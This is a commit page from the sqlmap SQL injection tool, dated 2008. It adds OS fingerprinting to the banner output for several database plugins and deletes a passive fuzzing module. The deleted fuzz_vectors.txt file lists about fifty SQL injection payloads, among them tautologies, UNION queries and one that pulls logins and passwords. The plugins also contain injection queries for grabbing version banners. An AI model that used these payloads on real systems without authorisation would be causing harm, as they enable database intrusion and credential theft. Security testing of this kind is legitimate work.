sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-03-14 15:14:31 +03:00
Code Issues Packages Projects Releases Wiki Activity

Minor enhancement to show the DBMS operating system (if fingerprinted)

Browse Source 
also when only -b option is provided since it's an information that
sqlmap get parsing the DBMS banner.
Got rid completely of useless passive fuzzing.
This commit is contained in:
Bernardo Damele 2008-11-17 11:22:03 +00:00
parent 7d7170fc97
commit 66fb3c3033
7 changed files with 99 additions and 149 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

43
lib/utils/fuzzer.py
View File

@ -1,43 +0,0 @@
#!/usr/bin/env python
"""
$Id$
This file is part of the sqlmap project, http://sqlmap.sourceforge.net.
Copyright (c) 2006-2008 Bernardo Damele A. G. <bernardo.damele@gmail.com>
and Daniele Bellucci <daniele.bellucci@gmail.com>
sqlmap is free software; you can redistribute it and/or modify it under
the terms of the GNU General Public License as published by the Free
Software Foundation version 2 of the License.
sqlmap is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
details.
You should have received a copy of the GNU General Public License along
with sqlmap; if not, write to the Free Software Foundation, Inc., 51
Franklin St, Fifth Floor, Boston, MA 02110-1301 USA
"""
from lib.core.agent import agent
from lib.core.data import logger
from lib.core.data import paths
from lib.request.connect import Connect as Request
def passiveFuzzing():
logMsg = "executing passive fuzzing to retrieve DBMS error messages"
logger.info(logMsg)
fuzzVectors = open(paths.FUZZ_VECTORS, "r")
for fuzzVector in fuzzVectors:
fuzzVector = fuzzVector.replace("\r", "").replace("\n", "")
payload = agent.payload(newValue=fuzzVector)
Request.queryPage(payload)

34
plugins/dbms/mssqlserver.py
View File

@ -46,7 +46,6 @@ from lib.core.unescaper import unescaper
from lib.parse.banner import bannerParser
from lib.request import inject
from lib.request.connect import Connect as Request
#from lib.utils.fuzzer import passiveFuzzing
from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem
@ -124,8 +123,19 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
def getFingerprint(self):
value = "back-end DBMS: "
actVer = formatDBMSfp()
value = ""
info = None
formatInfo = None
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if formatInfo:
value += "%s\n" % formatInfo
value += "back-end DBMS: "
actVer = formatDBMSfp()
if not conf.extensiveFp:
value += actVer
@ -135,12 +145,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
formatInfo = None
value += "active fingerprint: %s" % actVer
if self.banner:
info = bannerParser(self.banner)
if info:
release = info["dbmsRelease"]
version = info["dbmsVersion"]
servicepack = info["dbmsServicePack"]
formatInfo = formatOSfp(info)
if release and version and servicepack:
banVer = "Microsoft SQL Server %s " % release
@ -149,15 +157,11 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
#passiveFuzzing()
htmlErrorFp = getHtmlErrorFp()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if formatInfo:
value += "\n%s" % formatInfo
return value
@ -165,6 +169,9 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
if conf.dbms in MSSQL_ALIASES and kb.dbmsVersion and kb.dbmsVersion[0].isdigit():
setDbms("Microsoft SQL Server %s" % kb.dbmsVersion[0])
if conf.getBanner:
self.banner = inject.getValue("@@VERSION")
if not conf.extensiveFp:
return True
@ -172,10 +179,10 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
logger.info(logMsg)
randInt = str(randomInt(1))
query = "LTRIM(STR(LEN(%s)))" % randInt
query = "LTRIM(STR(LEN(%s)))" % randInt
if inject.getValue(query) == "1":
query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
query = "SELECT SUBSTRING((@@VERSION), 25, 1)"
version = inject.getValue(query)
if version == "8":
@ -190,9 +197,6 @@ class MSSQLServerMap(Fingerprint, Enumeration, Filesystem, Takeover):
else:
setDbms("Microsoft SQL Server")
if not conf.extensiveFp:
return True
if conf.getBanner:
self.banner = inject.getValue("@@VERSION")

40
plugins/dbms/mysql.py
View File

@ -47,7 +47,6 @@ from lib.core.unescaper import unescaper
from lib.parse.banner import bannerParser
from lib.request import inject
from lib.request.connect import Connect as Request
#from lib.utils.fuzzer import passiveFuzzing
from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem
@ -182,8 +181,19 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
def getFingerprint(self):
value = "back-end DBMS: "
actVer = formatDBMSfp()
value = ""
info = None
formatInfo = None
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if formatInfo:
value += "%s\n" % formatInfo
value += "back-end DBMS: "
actVer = formatDBMSfp()
if not conf.extensiveFp:
value += actVer
@ -198,25 +208,21 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
comVer = formatDBMSfp([comVer])
value += "\n%scomment injection fingerprint: %s" % (blank, comVer)
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if info:
# TODO: move to the XML banner file
banVer = info['version']
if re.search("-log$", self.banner):
banVer += ", logging enabled"
banVer = formatDBMSfp([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
#passiveFuzzing()
htmlErrorFp = getHtmlErrorFp()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if formatInfo:
value += "\n%s" % formatInfo
return value
@ -235,6 +241,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
if int(kb.dbmsVersion[0]) >= 5:
self.has_information_schema = True
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp:
return True
@ -261,6 +270,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
setDbms("MySQL 5")
self.has_information_schema = True
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp:
kb.dbmsVersion = [">= 5.0.0"]
return True
@ -306,6 +318,9 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
setDbms("MySQL 4")
kb.dbmsVersion = ["< 5.0.0"]
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp:
return True
@ -332,9 +347,6 @@ class MySQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
else:
kb.dbmsVersion = ["< 3.22.11"]
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
return True
else:
warnMsg = "the back-end DMBS is not MySQL"

32
plugins/dbms/oracle.py
View File

@ -39,7 +39,6 @@ from lib.core.settings import ORACLE_SYSTEM_DBS
from lib.core.unescaper import unescaper
from lib.parse.banner import bannerParser
from lib.request import inject
#from lib.utils.fuzzer import passiveFuzzing
from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem
@ -118,7 +117,18 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
def getFingerprint(self):
value = "back-end DBMS: "
value = ""
info = None
formatInfo = None
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if formatInfo:
value += "%s\n" % formatInfo
value += "back-end DBMS: "
if not conf.extensiveFp:
value += "Oracle"
@ -129,23 +139,16 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
formatInfo = None
value += "active fingerprint: %s" % actVer
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if info:
banVer = info['version']
banVer = formatDBMSfp([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
#passiveFuzzing()
htmlErrorFp = getHtmlErrorFp()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if formatInfo:
value += "\n%s" % formatInfo
return value
@ -153,6 +156,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
if conf.dbms in ORACLE_ALIASES:
setDbms("Oracle")
if conf.getBanner:
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
if not conf.extensiveFp:
return True
@ -177,6 +183,9 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
setDbms("Oracle")
if conf.getBanner:
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
if not conf.extensiveFp:
return True
@ -189,9 +198,6 @@ class OracleMap(Fingerprint, Enumeration, Filesystem, Takeover):
elif re.search("^8", version):
kb.dbmsVersion = ["8i"]
if conf.getBanner:
self.banner = inject.getValue("SELECT banner FROM v$version WHERE ROWNUM=1")
return True
else:
warnMsg = "the back-end DMBS is not Oracle"

32
plugins/dbms/postgresql.py
View File

@ -40,7 +40,6 @@ from lib.core.settings import PGSQL_SYSTEM_DBS
from lib.core.unescaper import unescaper
from lib.parse.banner import bannerParser
from lib.request import inject
#from lib.utils.fuzzer import passiveFuzzing
from plugins.generic.enumeration import Enumeration
from plugins.generic.filesystem import Filesystem
@ -118,7 +117,18 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
def getFingerprint(self):
value = "back-end DBMS: "
value = ""
info = None
formatInfo = None
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if formatInfo:
value += "%s\n" % formatInfo
value += "back-end DBMS: "
if not conf.extensiveFp:
value += "PostgreSQL"
@ -129,23 +139,16 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
formatInfo = None
value += "active fingerprint: %s" % actVer
if self.banner:
info = bannerParser(self.banner)
formatInfo = formatOSfp(info)
if info:
banVer = info['version']
banVer = formatDBMSfp([banVer])
value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer)
#passiveFuzzing()
htmlErrorFp = getHtmlErrorFp()
if htmlErrorFp:
value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp)
if formatInfo:
value += "\n%s" % formatInfo
return value
@ -157,6 +160,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
if conf.dbms in PGSQL_ALIASES:
setDbms("PostgreSQL")
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp:
return True
@ -180,6 +186,9 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
setDbms("PostgreSQL")
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
if not conf.extensiveFp:
return True
@ -215,9 +224,6 @@ class PostgreSQLMap(Fingerprint, Enumeration, Filesystem, Takeover):
else:
kb.dbmsVersion = ["< 6.2.0"]
if conf.getBanner:
self.banner = inject.getValue("VERSION()")
return True
else:
warnMsg = "the back-end DMBS is not PostgreSQL"

51
txt/fuzz_vectors.txt
View File

@ -1,51 +0,0 @@
'||(elt(-3+5,bin(15),ord(10),hex(char(45))))
||6
'||'6
(||6)
' OR 1=1--
OR 1=1
' OR '1'='1
; OR '1'='1'
%22+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+
' or 1=1--
" or 1=1--
' or 1=1 /*
or 1=1--
' or 'a'='a
" or "a"="a
') or ('a'='a
Admin' OR '
'%20SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES--
) UNION SELECT%20*%20FROM%20INFORMATION_SCHEMA.TABLES;
' having 1=1--
' having 1=1--
' group by userid having 1=1--
' SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = tablename')--
' or 1 in (select @@version)--
' union all select @@version--
' OR 'unusual' = 'unusual'
' OR 'something' = 'some'+'thing'
' OR 'text' = N'text'
' OR 'something' like 'some%'
' OR 2 > 1
' OR 'text' > 't'
' OR 'whatever' in ('whatever')
' OR 2 BETWEEN 1 and 3
' or username like char(37);
' union select * from users where login = char(114,111,111,116);
' union select
Password:*/=1--
UNI/**/ON SEL/**/ECT
'; EXECUTE IMMEDIATE 'SEL' || 'ECT US' || 'ER'
'; EXEC ('SEL' + 'ECT US' + 'ER')
'/**/OR/**/1/**/=/**/1
' or 1/*
+or+isnull%281%2F0%29+%2F*
%27+OR+%277659%27%3D%277659
%22+or+isnull%281%2F0%29+%2F*
%27+--+&password=
'; begin declare @var varchar(8000) set @var=':' select @var=@var+'+login+'/'+password+' ' from users where login >
@var select @var as var into temp end --

16
xml/banner/generic.xml
View File

@ -6,18 +6,34 @@
<info type="Windows"/>
</regexp>
<regexp value="Microsoft.*7\.0">
<info type="Windows" distrib="Vista"/>
</regexp>
<regexp value="Microsoft.*7\.0.*Service Pack (\d)">
<info type="Windows" distrib="Vista" sp="1"/>
</regexp>
<regexp value="Microsoft.*6\.0">
<info type="Windows" distrib="2003"/>
</regexp>
<regexp value="Microsoft.*6\.0.*Service Pack (\d)">
<info type="Windows" distrib="2003" sp="1"/>
</regexp>
<regexp value="Microsoft.*5\.1">
<info type="Windows" distrib="XP"/>
</regexp>
<regexp value="Microsoft.*5\.1.*Service Pack (\d)">
<info type="Windows" distrib="XP" sp="1"/>
</regexp>
<regexp value="Microsoft.*5\.0">
<info type="Windows" distrib="2000"/>
</regexp>
<regexp value="Microsoft.*5\.0.*Service Pack (\d)">
<info type="Windows" distrib="2000" sp="1"/>
</regexp>